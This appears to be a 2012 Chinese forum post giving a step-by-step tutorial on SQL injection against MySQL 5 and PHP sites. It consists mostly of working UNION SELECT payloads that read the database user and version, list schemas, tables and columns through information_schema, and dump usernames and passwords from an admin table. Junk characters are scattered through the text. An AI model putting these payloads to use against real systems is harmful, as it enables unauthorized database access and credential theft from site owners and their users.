" k, n& u) L$ v# O3 o# _) ]) [教程内容:Mysql 5+php 注入
' c0 u2 [8 U0 E/ p7 ?' W) c' R4 _7 A4 i$ e% N
" e+ }. S' ^3 _& j9 ^
* O/ A; C7 f' I2 ]5 t* `, v一.查看MYSQL基本信息(库名,版本,用户)! t- q9 u R ?% ^; O
- D, k4 n5 i, e9 j" Q+ sand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*4 w5 m& u) p4 V# U3 @
6 c: k1 E! a# O; i4 |) r: h& G二.查数据库
% O+ V: z* y" R, {5 |$ W8 ?- V4 H* `9 J2 _6 Z6 {% P: `7 ]
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*9 E3 k2 T" O; _6 G+ Q9 f
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
. {3 T& X/ e% x7 ]3 R: z& H6 F1 ^$ o1 C W# I1 b
三.暴表
0 V' }6 Q+ Z( O, x
& B' u, H$ B5 K$ ~and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
: t0 E; ^' T- {* h, p' t) T) H. g2 {3 Z
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
, n' f' G0 B# q& H# L" V5 J# q
0 s4 w0 X! Z) F" v' m& R0 c四.暴字段3 J6 |! h" ^ y8 s
% W- D7 o/ x3 a* ^& L' x
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
, W6 P7 W7 e: ?8 h# J/ v
, n5 C0 y( B7 L$ |) @0 c" q5 tlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。2 c; @; c) [' A0 s3 ~
( {2 Z6 ^! p+ R& ~ n, u, `) _ e* X五.暴数据
9 b% x" R B5 ^" Q
/ i; q. B& J# i* h/ gand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*% f& _, m/ U' ^3 W, l
4 ?2 V5 R2 b9 j4 H6 }/ M# E* e
& D/ j7 K: M" _1 b/ R/ b: |! ?2 Z这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
/ U s* w$ ~8 [7 [ |
发表于 2012-9-13 16:27:53
收藏
支持
反对